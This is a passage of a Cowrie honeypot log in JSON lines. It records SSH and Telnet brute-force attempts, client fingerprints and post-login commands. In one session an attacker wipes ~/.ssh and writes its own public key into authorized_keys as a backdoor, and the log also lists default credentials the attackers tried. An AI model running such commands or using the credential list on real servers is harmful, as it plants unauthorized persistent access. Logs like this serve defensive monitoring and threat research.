{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:02:14.760253Z","src_ip":"134.199.174.250","session":"d0210ef1ae20"}
{"eventid":"cowrie.login.failed","username":"test","password":"pass123","message":"login attempt [test/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:02:15.893259Z","src_ip":"134.199.174.250","session":"d0210ef1ae20"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:17.235644Z","src_ip":"134.199.174.250","session":"d0210ef1ae20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34486,"dst_ip":"1.2.3.4","dst_port":22,"session":"38eb6b59dc57","protocol":"ssh","message":"New connection: 212.227.235.229:34486 (1.2.3.4:22) [session: 38eb6b59dc57]","sensor":"my-vps","timestamp":"2025-09-08T13:02:23.950987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:23.977770Z","src_ip":"212.227.235.229","session":"38eb6b59dc57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:24.272714Z","src_ip":"212.227.235.229","session":"38eb6b59dc57"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"testnet","message":"login attempt [testnet/testnet] failed","sensor":"my-vps","timestamp":"2025-09-08T13:02:25.490457Z","src_ip":"212.227.235.229","session":"38eb6b59dc57"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:26.790531Z","src_ip":"212.227.235.229","session":"38eb6b59dc57"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.254.184","src_port":36580,"dst_ip":"1.2.3.4","dst_port":22,"session":"a52ac6e83d50","protocol":"ssh","message":"New connection: 152.32.254.184:36580 (1.2.3.4:22) [session: a52ac6e83d50]","sensor":"my-vps","timestamp":"2025-09-08T13:02:35.872689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:35.875266Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:36.132726Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.login.success","username":"root","password":"q1q1q1","message":"login attempt [root/q1q1q1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:02:37.145346Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:02:37.670846Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:02:37.671647Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:02:37.672593Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:37.929610Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:02:38.520839Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:02:38.521511Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:02:38.777997Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:38.778887Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.254.184","src_port":37252,"dst_ip":"1.2.3.4","dst_port":22,"session":"966744a2d2ef","protocol":"ssh","message":"New connection: 152.32.254.184:37252 (1.2.3.4:22) [session: 966744a2d2ef]","sensor":"my-vps","timestamp":"2025-09-08T13:02:39.031991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:39.040074Z","src_ip":"152.32.254.184","session":"966744a2d2ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:39.292735Z","src_ip":"152.32.254.184","session":"966744a2d2ef"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:02:40.321679Z","src_ip":"152.32.254.184","session":"966744a2d2ef"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:41.581387Z","src_ip":"152.32.254.184","session":"966744a2d2ef"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.254.184","src_port":37956,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cff4005655c","protocol":"ssh","message":"New connection: 152.32.254.184:37956 (1.2.3.4:22) [session: 9cff4005655c]","sensor":"my-vps","timestamp":"2025-09-08T13:02:41.826960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:41.827880Z","src_ip":"152.32.254.184","session":"9cff4005655c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:42.085082Z","src_ip":"152.32.254.184","session":"9cff4005655c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:02:43.132097Z","src_ip":"152.32.254.184","session":"9cff4005655c"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:43.381826Z","src_ip":"152.32.254.184","session":"a52ac6e83d50"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:43.382723Z","src_ip":"152.32.254.184","session":"9cff4005655c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37272,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e34c5bd3340","protocol":"telnet","message":"New connection: 212.227.235.229:37272 (1.2.3.4:23) [session: 5e34c5bd3340]","sensor":"my-vps","timestamp":"2025-09-08T13:02:43.792604Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:02:43.989581Z","src_ip":"212.227.235.229","session":"5e34c5bd3340"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:02:44.010163Z","src_ip":"212.227.235.229","session":"5e34c5bd3340"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T13:02:44.011458Z","src_ip":"212.227.235.229","session":"5e34c5bd3340"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T13:02:44.012500Z","src_ip":"212.227.235.229","session":"5e34c5bd3340"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":60326,"dst_ip":"1.2.3.4","dst_port":22,"session":"39c49631e9e9","protocol":"ssh","message":"New connection: 134.199.174.250:60326 (1.2.3.4:22) [session: 39c49631e9e9]","sensor":"my-vps","timestamp":"2025-09-08T13:02:48.626533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:02:48.627532Z","src_ip":"134.199.174.250","session":"39c49631e9e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:02:48.918173Z","src_ip":"134.199.174.250","session":"39c49631e9e9"}
{"eventid":"cowrie.login.failed","username":"test","password":"123abc","message":"login attempt [test/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:02:49.831939Z","src_ip":"134.199.174.250","session":"39c49631e9e9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:51.158167Z","src_ip":"134.199.174.250","session":"39c49631e9e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46454,"dst_ip":"1.2.3.4","dst_port":22,"session":"4932cb25a989","protocol":"ssh","message":"New connection: 212.227.235.229:46454 (1.2.3.4:22) [session: 4932cb25a989]","sensor":"my-vps","timestamp":"2025-09-08T13:02:51.490418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:02:51.491395Z","src_ip":"212.227.235.229","session":"4932cb25a989"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:02:51.615989Z","src_ip":"212.227.235.229","session":"4932cb25a989"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1.123","message":"login attempt [test1/test1.123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:02:52.156916Z","src_ip":"212.227.235.229","session":"4932cb25a989"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:02:53.284979Z","src_ip":"212.227.235.229","session":"4932cb25a989"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57446,"dst_ip":"1.2.3.4","dst_port":22,"session":"95669695cf96","protocol":"ssh","message":"New connection: 212.227.235.229:57446 (1.2.3.4:22) [session: 95669695cf96]","sensor":"my-vps","timestamp":"2025-09-08T13:03:02.263915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:03:02.264683Z","src_ip":"212.227.235.229","session":"95669695cf96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:03:02.562940Z","src_ip":"212.227.235.229","session":"95669695cf96"}
{"eventid":"cowrie.login.failed","username":"informix","password":"111111","message":"login attempt [informix/111111] failed","sensor":"my-vps","timestamp":"2025-09-08T13:03:03.840102Z","src_ip":"212.227.235.229","session":"95669695cf96"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:03:05.108914Z","src_ip":"212.227.235.229","session":"95669695cf96"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":45766,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3915c122d5a","protocol":"ssh","message":"New connection: 139.59.14.27:45766 (1.2.3.4:22) [session: e3915c122d5a]","sensor":"my-vps","timestamp":"2025-09-08T13:03:12.385812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:03:12.386767Z","src_ip":"139.59.14.27","session":"e3915c122d5a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2